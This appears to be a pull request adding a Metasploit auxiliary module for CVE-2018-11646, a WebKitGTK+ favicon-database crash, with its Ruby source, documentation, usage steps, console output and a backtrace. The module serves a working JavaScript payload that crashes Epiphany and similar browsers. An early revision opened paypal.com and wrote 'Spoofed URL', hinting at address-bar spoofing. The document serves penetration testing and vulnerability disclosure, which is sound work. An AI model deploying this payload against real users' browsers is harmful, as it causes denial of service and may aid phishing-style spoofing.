### PR TITLE
WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646

### DIFF
--- a/documentation/modules/auxiliary/dos/http/webkitplus.md
+++ b/documentation/modules/auxiliary/dos/http/webkitplus.md
@@ -1,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. 
+
+Related links : 
+https://bugs.webkit.org/show_bug.cgi?id=186164
+https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
+
+## Backtrace using Fedora 27
+
+```
+#0 WTF::StringImpl::rawHash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
+#1 WTF::StringImpl::hasHash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
+#2 WTF::StringImpl::hash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
+#3 WTF::StringHash::hash
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
+#9 WTF::HashMap, WTF::HashTraits >::get
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
+#10 webkitFaviconDatabaseSetIconURLForPageURL
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
+#11 webkitFaviconDatabaseSetIconForPageURL
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
+#12 webkitWebViewSetIcon
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
+#13 WTF::Function::performCallbackWithReturnValue
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
+#15 WebKit::WebPageProxy::dataCallback
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
+#16 WebKit::WebPageProxy::finishedLoadingIcon
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
+#17 IPC::callMemberFunctionImpl::operator()
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
+#29 WTF::RunLoop::::_FUN(gpointer)
+at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
+#30 g_main_dispatch
+at gmain.c line 3148
+#31 g_main_context_dispatch
+at gmain.c line 3813
+#32 g_main_context_iterate
+at gmain.c line 3886
+#33 g_main_context_iteration
+at gmain.c line 3947
+#34 g_application_run
+at gapplication.c line 2401
+#35 main
+at ../src/ephy-main.c line 432 
+
+```
+
+## Verification
+
+    Start msfconsole
+    use auxiliary/dos/http/webkitplus
+    Set SRVHOST
+    Set SRVPORT
+    Set URIPATH
+    run (Server started)
+Visit server URL in epiphany web browser which uses webkit. 
+
+## Scenarios
+
+```
+msf auxiliary(dos/http/webkitplus) > show options 
+
+Module options (auxiliary/dos/http/webkitplus):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.1.105    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH  /                no        The URI to use for this exploit (default is random)
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   WebServer
+
+
+msf auxiliary(dos/http/webkitplus) > run
+[*] Auxiliary module running as background job 0.
+msf auxiliary(dos/http/webkitplus) > 
+[*] Using URL: http://192.168.1.105:8080/
+[*] Server started.
+
+msf auxiliary(dos/http/webkitplus) > 
+[*] Sending response
+
+msf auxiliary(dos/http/webkitplus) >
+```

--- a/documentation/modules/auxiliary/dos/http/webkitplus.md
+++ b/documentation/modules/auxiliary/dos/http/webkitplus.md
@@ -1,10 +1,15 @@
 ## Vulnerable Application
 
-This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. 
+This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
+If successful, it could lead to application crash, resulting in denial of service.
+
+The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
+functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
+through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.
 
 Related links : 
-https://bugs.webkit.org/show_bug.cgi?id=186164
-https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
+* https://bugs.webkit.org/show_bug.cgi?id=186164
+* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
 
 ## Backtrace using Fedora 27
 

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -1,0 +1,59 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "WebKitGTK+ leading to an application crash [DoS]",
+        'Description'    => %q(
+          This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
+          If successful,it could leads to application crash, denial of service.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra', # Original discovery, disclosure
+          'Hardik Mehta',  # Original discovery, disclosure
+          'Zubin Devnani', # Original discovery, disclosure
+          'Manuel Caballero' #JS Code
+        ],
+        'References' => [
+          ['EXPLOIT-DB', '44842'],
+          ['CVE', '2018-11646'],
+          ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
+          ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
+        ],
+        'DisclosureDate' => 'June 03 2018',
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = <<-JS
+<script type="text/javascript">
+   win = window.open("sleep_one_second.php", "WIN"); 
+   window.open("https://www.paypal.com", "WIN");  
+   win.document.execCommand('Stop');              
+   win.document.write("Spoofed URL");   
+   win.document.close();
+</script>
+    JS
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    send_response(cli, @html)
+  end
+end

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -43,11 +43,11 @@ class MetasploitModule < Msf::Auxiliary
   def setup
     @html = <<-JS
 <script type="text/javascript">
-   win = window.open("sleep_one_second.php", "WIN"); 
-   window.open("https://www.paypal.com", "WIN");  
-   win.document.execCommand('Stop');              
-   win.document.write("Spoofed URL");   
-   win.document.close();
+win = window.open("sleep_one_second.php", "WIN"); 
+window.open("https://www.paypal.com", "WIN");  
+win.document.execCommand('Stop');              
+win.document.write("Spoofed URL");   
+win.document.close();
 </script>
     JS
   end

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
           ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
         ],
-        'DisclosureDate' => 'June 03 2018',
+        'DisclosureDate' => 'Jun 03 2018',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Auxiliary::Dos
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "WebKitGTK+ leading to an application crash [DoS]",
+        'Name'           => "WebKitGTK+ WebKitFaviconDatabase DoS",
         'Description'    => %q(
           This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
           If successful,it could leads to application crash, denial of service.
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           'Manuel Caballero' #JS Code
         ],
         'References' => [
-          ['EXPLOIT-DB', '44842'],
+          ['EDB', '44842'],
           ['CVE', '2018-11646'],
           ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
           ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -43,10 +43,10 @@ class MetasploitModule < Msf::Auxiliary
   def setup
     @html = <<-JS
 <script type="text/javascript">
-win = window.open("sleep_one_second.php", "WIN"); 
-window.open("https://www.paypal.com", "WIN");  
-win.document.execCommand('Stop');              
-win.document.write("Spoofed URL");   
+win=window.open("sleep_one_second.php", "WIN");
+window.open("https://www.paypal.com", "WIN");
+win.document.execCommand('Stop');
+win.document.write("Spoofed URL");
 win.document.close();
 </script>
     JS

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name'           => "WebKitGTK+ WebKitFaviconDatabase DoS",
         'Description'    => %q(
           This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
-          If successful,it could leads to application crash, denial of service.
+          If successful, it could lead to application crash, resulting in denial of service.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -43,11 +43,11 @@ class MetasploitModule < Msf::Auxiliary
   def setup
     @html = <<-JS
 <script type="text/javascript">
-win=window.open("sleep_one_second.php", "WIN");
-window.open("https://www.paypal.com", "WIN");
-win.document.execCommand('Stop');
-win.document.write("Spoofed URL");
-win.document.close();
+ win = window.open("WIN", "WIN");
+ window.open("http://example.com/", "WIN");
+ win.document.execCommand('stop');
+ win.document.write("HelloWorld");
+ win.document.close();
 </script>
     JS
   end


### PR DESCRIPTION
## Summary 

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. 

**Tested on** :  `Epiphany Web Browser 3.28.x`

## Verification 
```
msf auxiliary(dos/http/webkitplus) > show options 

Module options (auxiliary/dos/http/webkitplus):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer


msf auxiliary(dos/http/webkitplus) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(dos/http/webkitplus) > 
[*] Using URL: http://192.168.1.105:8080/
[*] Server started.

msf auxiliary(dos/http/webkitplus) > 
[*] Sending response

msf auxiliary(dos/http/webkitplus) >
```

**Backtrace using Fedora 27** 

```
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 
```

**References:** 
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html